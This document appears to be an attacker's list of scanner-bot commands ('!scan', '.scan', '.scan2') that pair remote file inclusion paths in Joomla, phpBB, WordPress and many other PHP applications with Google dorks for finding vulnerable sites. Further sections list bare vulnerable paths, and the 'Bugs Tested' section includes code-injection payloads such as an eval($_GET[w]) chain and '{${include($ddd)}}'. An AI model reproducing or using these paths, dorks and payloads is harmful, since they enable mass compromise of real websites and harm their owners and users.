!scan plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]= geeklog

!scan admin.php?include_path= "IP-adres genoteerd" "HTML is"

!scan index.php?strona= "/index.php?strona="

!scan index.php?strona= "/index.php?strona=" site:pl

!scan index1.php?page= "/index1.php?page="

!scan index1.php?page= "/index1.php?page=" ".php"

!scan includes/functions_mod_user.php?phpbb_root_path= phpBBViet

!scan ?mosConfig_absolute_path= "Joomla! is Free Software released under the GNU/GPL License."

!scan ?mosConfig_absolute_path= "Joomla Is"

!scan language/lang_english/lang_main_album.php?phpbb_root_path= "Czech translation by Vitek"

!scan index.php?pg= "Search | Invite | Mail | Blog | Forum" site:mx

!scan administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path= inurl:"com_jjgallery

!scan modules/Neos_Chronos/header.php?base_folder= "Neos_Chronos"

!scan historytemplate.php?cms[support]=1&cms[tngpath]= "powered by The Next Generation of Genealogy Sitebuilding"

!scan includes/messages.inc.php?include_path= messages.inc.php

!scan contact.php?AD_BODY_TEMP= "Not+required+for+reporting+a+file"

!scan includes/db_connect.php?baseDir= "dotProject" "Version" "cookie" site:cn

!scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= /modules/Forums/

!scan contenido/classes/class.inuse.php?cfg[path][contenido]= Contenido Login

!scan includes/db_connect.php?baseDir= "dotProject logo"

!scan index.php?lg= "index.php?lg=" site:be

!scan skin/zero_vote/ask_password.php?dir= zeroboard site:.us

!scan admin.php?include_path= "Total Records:" "HTML code is" "Advanced" site:.com

!scan index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= mambo

!scan admin.php?include_path= "Total Records:" "HTML code is" "Advanced

!scan components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path= com_pollxt

!scan administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path= com_colophon

!scan components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path= com_loudmounth

!scan components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= com_videodb

!scan components/com_cloner/cloner.php?mosConfig_absolute_path= "joomla"

!scan administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path= com_multibanners

!scan administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site= com_a6mambohelpdesk

!scan components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path= com_mambatstaff

!scan components/com_securityimages/configinsert.php?mosConfig_absolute_path= com_securityimages

!scan components/com_securityimages/lang.php?mosConfig_absolute_path= com_securityimages

!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= com_artlinks

!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= com_galleria

!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= com_mgm

!scan components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path= com_mambatstaff

!scan redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]= inurl:redaxo

!scan admin.php?include_path= Advanced Guestbook 2.3.4

!scan template.php?page= phpBB Group

!scan phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path= phpBB Group

!scan forum/admin/admin_cash.php?setmodules=1&phpbb_root_path= phpBB Group

!scan mods/iai/includes/constants.php?phpbb_root_path= phpBB PlusXL

!scan phpBB2-MODificat/includes/functions.php?phpbb_root_path= PHPBB2

!scan includes/bbcb_mg.php?phpbb_root_path= phpBBXS

!scan includes/archive/archive_topic.php?phpbb_root_path= phpbbXtra

!scan modules.php?op=modload&name=Wiki&file=index&pagename= PHP-Wiki

!scan includes/setup.php?phpc_root_path= PHP-Calendar

!scan templates/default/tpl_message.php?right_file= "PHP TopTree BBS"

!scan config.php?fullpath= "PHP TopSites"

!scan auction/email_request.php?user_id= "PHP Surveyor"

!scan modules/projects/index.php?full_path= "PHP Project Management"

!scan xarg_corner.php?xarg= "PHP Image XArg"

!scan screen.php?neurl= "News Evolution"

!scan /_theme/breadcrumb.php?rootBase= new Female Celebrities

!scan show.php?file= "Helplink"

!scan form.php?floap=modfich&do= GenesisTrader

!scan inc/pipe.php?HCL_path= "Help Center Live"

!scan admin/business_inc/saveserver.php?thisdir= confixx

!scan modules/Forums/favorites.php?nuke_bb_root_path= "Powered by Platinum"

!scan /manager/index.php= "Etomite"

!scan /index.php?basePath= "gizzar"

!scan /Index.php?abs_url= "PEGames"

!scan /index.php?page= "3editor CMS"

!scan /index.php?AML_opensite= "AllMyLinks"

!scan /index.php?AMV_openconfig=1&AMV_serverpath= "AllMyVisitors"

!scan /lang/index.php?file= "oreon"

!scan /index.php?gen= "mafia-2-0-0"

!scan /index.php?catid= "CascadianFAQ"

!scan /index.php?rootpath= "DreamStats System"

!scan /index.php?n= "Jupiter CMS"

!scan /index.php?option=news&aktion=komm&ID= "HC NEWSSYSTEM"

!scan /index.php?function=custom&custom= "Shopping Catalog"

!scan /admin/index.php?p= "iPrimal"

!scan /classes/index.php?siteconf= "Lithium"

!scan /Cookie/index.php= "Imageview"

!scan /index.php= "Berty Forum"

!scan /index.php?section= "Jasmine-Web"

!scan /index.php?contentSpecial= "eboli"

!scan /templates/tmpl_dfl/scripts/index.php?dir[inc]= "Boonex Dolphin"

!scan /index.php?page= "tagit2b"

!scan /index.php?catid= "PHP Classifieds"

!scan /search.php?catid_search= "PHP Classifieds"

!scan /p!scan /search.php?catid_search= "PHP Classifieds"

!scan /index.php?file_name[]= "PowerPortal"

!scan /admin/index.php?o= "BrudaGB"

!scan /index.php?gr_1_id= "Eskolar"

!scan /boitenews4/index.php?url_index= "Boite de News"

!scan /index.php?news_include_path= "newsReporter"

!scan /index.php?page= "ClanSys"

!scan /index.php?mod=sondages&do= "PwsPHP"

!scan /appserv/main.php?appserv_root= appserv

!scan solpot.html?body= allinurl: "solpot.html?body"

!scan /config.php?xcart_dir= "X-CART"

Old Bug-Dork

.scan ///////?cmd&file= "List Users with Pics only?"
.scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/
.scan /include/scripts/export_batch.inc.php?DIR= ModernBill
.scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= technote7
.scan /?sIncPath= "BoonEx- Community Software"
.scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement
.scan ?custompluginfile[]= index.php?categoryid=5
.scan ?custompluginfile[]= index.php?categoryid=10
.scan ?custompluginfile[]= index.php?categoryid=15
.scan /?installed_config_file= "PhpJobScheduler"
.scan /pjsfiles/modify.php?installed_config_file= "PhpJobScheduler"
.scan errors.php?error= "/com_rwcards" "/com_rwcards"
.scan //vwar/backup/errors.php?error= "errors.php"
.scan errors.php?error= "netcat_files"
.scan /index.php?DOCUMENT_ROOT= "netcat_files"
.scan plugins/safehtml/HTMLSax3.php?dir[plugins]= "powered by boonex"
.scan errors.php?error= "powered by boonex"
.scan ?sourcedir= index.php?sourcedir=
.scan errors.php?error= "/com_ponygallery"
.scan /?page= /?pagedb=?
.scan /?include_path= "guestbook"
.scan /?include_path= "action"+"poll_ident"
.scan /admin/include/lib.module.php?mod_root= "/cmsworks"
.scan errors.php?error= "/com_extcalendar"
.scan errors.php?error= "phpkit" "phpkit"
.scan errors.php?error= "/contenido/includes"
.scan popup.php?path= "phpkit" "phpkit"
.scan errors.php?error= "Subdreamer"
.scan //?custompluginfile%5B%5D= Created by Subdreamer CMS
.scan lostpasswd.php?env[include_prefix]= bookmark4u
.scan /poll/png.php?include_path= "action"+"poll_ident"
.scan /inc/formmail.inc.php?script_root= "Powered By Form Mail Script"
.scan errors.php?error= "powered by TalkBack"
.scan /components/errors.php?error= "com_simpleboard"
.scan /modules/errors.php?error= "/includes/mambo.php"
.scan /errors.php?error= "Joomla Visites"
.scan /modules/Forums/admin/errors.php?error= com_gallery
.scan /include/bbs.lib.inc.php?site_path= "/rgboard/
.scan errors.php?error= "/appserv"

Joomla Bugs

/components/com_flyspray/startdown.php?file=
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_securityimages/lang.php?mosConfig_absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/akocomments.php?mosConfig_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/cropcanvas.php?cropimagedir=
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_fm/fm.install.php?lm_absolute_path=
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
/components/com_lmo/lmo.php?mosConfig_absolute_path=
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=
/administrator/components/com_webring/admin.webring.docs.php?component_dir=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
/components/com_mambowiki/Mam***ogin.php?IP=
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/components/com_moodle/moodle.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/components/com_mospray/scripts/admin.php?basedir=
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
/components/com_madeira/img.php?url=
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=
/com_bsq_sitestats/external/rssfeed.php?baseDir=
/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/components/com_joomlaboard/file_upload.php?sbp=
/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
/modules/mod_weather.php?absolute_path=
/components/calendar/com_calendar.php?absolute_path=
/modules/calendar/mod_calendar.php?absolute_path=
/components/com_calendar.php?absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=

Bug Dork WordPress

index/wp-content/plugins/Enigma2.php?boarddir=
mygallery/myfunctions/mygallerybrowser.php?myPath=
plugins/wp-table/js/wptable-button.phpp?wpPATH=
plugins/wordtube/wordtube-button.php?wpPATH=
plugins/myflash/myflash-button.php?wpPATH=
plugins/BackUp/Archive.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=
plugins/sniplets/modules/syntax_highlight.php?libpath=

Bug Dork PHPBB

/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=
/language/lang_german/lang_main_album.php?phpbb_root_path=
link_main.php?phpbb_root_path=
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=
MOD_forum_fields_parse.php?phpbb_root_path=
/codebb/pass_code.php?phpbb_root_path=
/codebb/lang_select?phpbb_root_path=
includes/functions_nomoketos_rules.php?phpbb_root_path=
includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/ezconvert/config.php?ezconvert_dir=
/includes/class_template.php?phpbb_root_path=
/includes/usercp_viewprofile.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
menu.php?sesion_idioma=
/includes/functions.php?phpbb_root_path=
/admin/admin_linkdb.php?phpbb_root_path=
/admin/admin_forum_prune.php?phpbb_root_path=
/admin/admin_extensions.php?phpbb_root_path=
/admin/admin_board.php?phpbb_root_path=
/admin/admin_attachments.php?phpbb_root_path=
/admin/admin_users.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/admin/modules_data.php?phpbb_root_path=
/faq.php?foing_root_path=
/index.php?foing_root_path=
/list.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/gen_m3u.php?foing_root_path=
/view_artist.php?foing_root_path=
/view_song.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/flash/set_na.php?foing_root_path=
/flash/initialise.php?foing_root_path=
/flash/get_song.php?foing_root_path=
/includes/common.php?foing_root_path=
/admin/nav.php?foing_root_path=
/admin/main.php?foing_root_path=
/admin/list_artists.php?foing_root_path=
/admin/index.php?foing_root_path=
/admin/genres.php?foing_root_path=
/admin/edit_artist.php?foing_root_path=
/admin/edit_album.php?foing_root_path=
/admin/config.php?foing_root_path=
/admin/admin_status.php?foing_root_path=
language/lang_english/lang_prillian_faq.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/language/lang_french/lang_prillian_faq.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/functions_rpg_events.php?phpbb_root_path=
/admin/admin_spam.php?phpbb_root_path=
/includes/functions_newshr.php?phpbb_root_path=
/zufallscodepart.php?phpbb_root_path=
/mods/iai/includes/constants.php?phpbb_root_path=
/root/includes/antispam.php?phpbb_root_path=
/phpBB2/shoutbox.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/journals_delete.php?phpbb_root_path=
/includes/journals_post.php?phpbb_root_path=
/includes/journals_edit.php?phpbb_root_path=
/includes/functions_num_image.php?phpbb_root_path=
/includes/functions_user_viewed_posts.php?phpbb_root_path=
/includes/themen_portal_mitte.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/functions_static_topics.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=
/includes/functions_kb.php?phpbb_root_path=
/includes/bbcb_mg.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=
/includes/pafiledb_constants.php?module_root_path=
/index.php?phpbb_root_path=
/song.php?phpbb_root_path=
/faq.php?phpbb_root_path=
/list.php?phpbb_root_path=
/gen_m3u.php?phpbb_root_path=
/playlist.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/modules/Forums/admin/index.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_board.php?phpbb_root_path=
/modules/Forums/admin/admin_disallow.php?phpbb_root_path=
/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=
/modules/Forums/admin/admin_groups.php?phpbb_root_path=
/modules/Forums/admin/admin_ranks.php?phpbb_root_path=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=
/modules/Forums/admin/admin_words.php?phpbb_root_path=
/modules/Forums/admin/admin_avatar.php?phpbb_root_path=
/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=
/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=
/modules/Forums/admin/admin_forums.php?phpbb_root_path=
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=
/modules/Forums/admin/admin_smilies.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_users.php?phpbb_root_path=
/stat_modules/users_age/module.php?phpbb_root_path=
/includes/functions_cms.php?phpbb_root_path=
/m2f/m2f_phpbb204.php?m2f_root_path=
/m2f/m2f_forum.php?m2f_root_path=
/m2f/m2f_mailinglist.php?m2f_root_path=
/m2f/m2f_cron.php?m2f_root_path=
/lib/phpbb.php?subdir=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_admin.php?phpbb_root_path=
/toplist.php?f=toplist_top10&phpbb_root_path=
/admin/addentry.php?phpbb_root_path=
/includes/kb_constants.php?module_root_path=
/auth/auth.php?phpbb_root_path=
/auth/auth_phpbb/phpbb_root_path=
/auction/auction_common.php?phpbb_root_path=
/auth/auth_SMF/smf_root_path=
/auth/auth.php?smf_root_path=

Bug&dork New

.scan /index.php?_SERVER[DOCUMENT_ROOT]= “powered by Clicknet CMS”
.scan /include/admin.lib.inc.php?site_path= “rgboard
.scan /header.php?base_folder= “Powered by Bab.stats”
.scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path= “/index.php?option=com_content”
.scan /admin.php?include_path= “Guestbook”
.scan //main.php?_zb_path= “main.php”
.scan //login.php?_zb_path= “login.php”
.scan /////?_SERVER[DOCUMENT_ROOT]= “/board” site:.kr
.scan /admin.php?include_path= “gastenboek”
.scan /docebo/doceboLms//class/class.dashboard_lms.php?where_framework= “doceboLms”
.scan /encapscms_PATH/core/core.php?root= “encapscms 0.3.6″ “encapscms 0.3.6″
.scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= “/PNphpBB2/”
.scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= “PHP-NUKE”
.scan /s_loadenv.inc.php?DOCUMENT_ROOT= “netcat require”
.scan /index.php?DOCUMENT_ROOT= “netcat_files”
.scan /ray.3.5/modules/global/inc/content.inc.php?sIncPath= “boonex”
.scan /?page= /?pagedb=?
.scan ?sourcedir= index.php?sourcedir=
.scan /security/include/_class.security.php?PHPSECURITYADMIN_PATH= “web3news”
.scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= “/plugins/sniplets/”

Bugs Tested

.scan /components/com_joomlalib/standalone/stubjambo.php?baseDir= “/index.php?option=com_easybook”
.scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=50?
.scan /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “Diese Seite wurde mit der quelloffenen Software CMS Made Simple erstellt.”
.scan /members/?INC= “YourWebsitename gives you the best search results and keyword bidding.”
.scan /members/?INC= “If You lost password enter Your login:”
.scan2 ////////?cmd&file= “index.php?cmd=10?
.scan2 /include/admin.lib.inc.php?site_path= /list.php?bbs_id=
.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= “option,com_joomlalib”
.scan2 /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath= “/plugins/mygallery/”
.scan2 /skins/advanced/advanced1.php?pluginpath[0]= “/advanced2.php”
.scan2 /admin/auth.php?xcart_dir= “/pages.php?pageid=3? -p 200
.scan2 /admin/auth.php?xcart_dir= “/admin/auth.php?xcart_dir=”
.scan2 /?sourcedir= “/QueryString.php”
.scan2 /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path= “/board.php?board=”
.scan2 ?sourcedir= index.php?sourcedir=
.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= /index.php?option=com_gallery2
.scan2 /bemarket/postscript/postscript.php?p_mode= /bemarket/
.scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= /index.php?mact= -p 200
.scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= News,cntnt01,detail,0&cntnt01articleid= -p100
.scan2 /stats.php?dir[func]=&dir[base]= “mygamingladder” “my gaming ladder”
.scan2 /extras/poll/poll.php?file_newsportal= “/post.php?newsgroups=”
.scan2 /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= “com_sitemap”
.scan2 /autoclose.php?subd= “Help Desk Software By Kayako eSupport v3.10.02?
.scan2 /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/board.php?board=”
.scan2 /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/kboard.php?board=notice”
.scan2 /inc/shows.inc.php?cutepath= “Translated by Slaver”
.scan2 /themes/default/index.php?main= “cfagcms” “cfagcms”
.scan2 /themes/default/index.php?main= “cfag cms”
.scan2 /comments.php?id={${include($ddd)}}{${exit()}}&ddd= “poll_ssi.php”
.scan2 /poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= “/poll_cookie.php”
.scan2 /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “/index.php?option=com_content” xoo
.scan2 /admin.php?include_path= “Powered by Lazarus Guestbook from carbonize.co.uk”
.scan2 /classes/Import_MM.class.php?g_rb_basedir= “PHPRecipeBook”
.scan2 /?sIncPath= “Copyright © 2008 Your Company.”
.scan2 /?sIncPath= “/index.php?members_mode=”
.scan2 /?sIncPath= “/index.php?members_mode=top”
.scan2 /?sIncPath= “index.php?tags_mode=profile”
.scan2 /common/db.php?commonpath= “playing.php”
.scan2 /update/update2.php?lang= photokorn 1.53
.scan2 /index.php?view=page&pagename= “/?view=main&cityid=”
.scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;”
.scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3〈=en”
.scan2 /index.php?load= “/index.php?load=home”
.scan2 /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= “/index.php?module=Pagesetter”
.scan2 /index.php?view=page&pagename= “/?view=main&cityid=”
.scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;”
.scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3〈=en”
.scan2 /page.php?id= “RCMS-Pro”
.scan2 /page.php?id= “©2005 – 2006 Roosevelt Purification. RGameScript is a free software under GNU/GPL License”
.scan2 /page.php?id= “/index.php?id=cats”
.scan2 /function.inc.php?path= “ACGVclick” “ACGVclick”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx” “MODx”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx Parse Error”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=5?
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=1&start=10?
.scan2 /tools/send_reminders.php?noSet=0&includedir= “WebCalendar v1.1.0c-CVS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “snippets/reflect”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx CMS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “My MODx Site is powered by MODx Content Management System”
.scan2 /index.php?view=page&pagename= “Buy, sell, trade, date, events… post anything”
.scan2 /index.php?view=page&pagename= “Thank you for stopping by my site. Here you can leave your mark.”
.scan2 /includes/function_core.php?web_root= “Mp3 Rating”
.scan2 /?mosConfig_absolute_path= “Powered by Joomla!”
.scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Hebrew Ver. HebNukeR 2.0 © 2004 by HebNukeR.org. All Rights Reserved”
.scan2 /index.php?option=com_custompages&cpage= Joomla custompages
.scan2 /booth.php?include_path= “/poll_cookie.php”
.scan2 /update/update2.php?lang= “photo foto gallery bilder tauchen wracks galerie”
.scan2 /header.php?base_folder= “Powered by Bab.stats”
.scan2 /tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0RC3 (11 Mar 2005)
.scan2 /booth.php?include_path= “/poll_cookie.php”
.scan2 /index.php?cmd&file= “Membre avec photos seulement ?”
.scan2 /index.php?cmd&file= “%22HOME%22+%22%7C%22+%22UPLOAD+YOUR+PHOTO%22+%22%7C%22+%22LATEST+USERS%22+%22%7C%22+%22TOP+10%22+%22%7C%22+%22TOP+GUYS%22+%22%7C%22+%22TOP+GIRLS%22+%22%7C%22+%22CONTACT%22?
.scan2 /index.php?cmd&file= “List Users with Pics only?”
.scan2 /index.php?cmd&file= “So you think you’re HOT?”
.scan2 /contenido/external/frontend/news.php?cfg[path][includes]= Contenido Login
.scan2 /contenido/external/frontend/news.php?cfg[path][includes]= “Contenido Login” “Contenido Login”
.scan2 /clmcpreload.php?CLPATH= “CaLogic” “Calendars”
.scan2 /txt-db-api/txt-db-api.php?API_HOME_DIR= “linkmix” “linkmix” “linkmix”
.scan2 /cms/system/openengine.php?oe_classpath= “/cms/website.php?id=/de/”
.scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Thai Edition by ThaiNuke”
.scan2 index.php?custompluginfile[]= “Sorry, your account does not have access to submit information”
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /index.php?nwaction=shownews
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /article.php?article_file=
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= “Newswriter” “Newswriter”
.scan2 /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= “coppermine” “coppermine” “coppermine”
.scan2 /config.inc.php?path_escape= “Your Personal Search Advisor !”
.scan2 /include/scripts/export_batch.inc.php?DIR= “ModernBill”
.scan2 /config/config_admin.php?INC= “YourWebsitename gives you the best search results and keyword bidding.”
.scan2 /config/config_admin.php?INC= %22home%22+%22%7C%22+%22login%22+%22%7C%22+%22add+your+site%22+%22%7C%22+%22affiliate+program%22+%22%7C%22+%22privacy%22+%22%7C%22+%22terms%22
.scan2 /include/admin.lib.inc.php?site_path= /view.php?bbs_id=
.scan2 /clmcpreload.php?CLPATH= “© Philip Boone”
.scan components/com_virtuemart/install.php?mosConfig_absolute_path= “powered by VirtueMart”
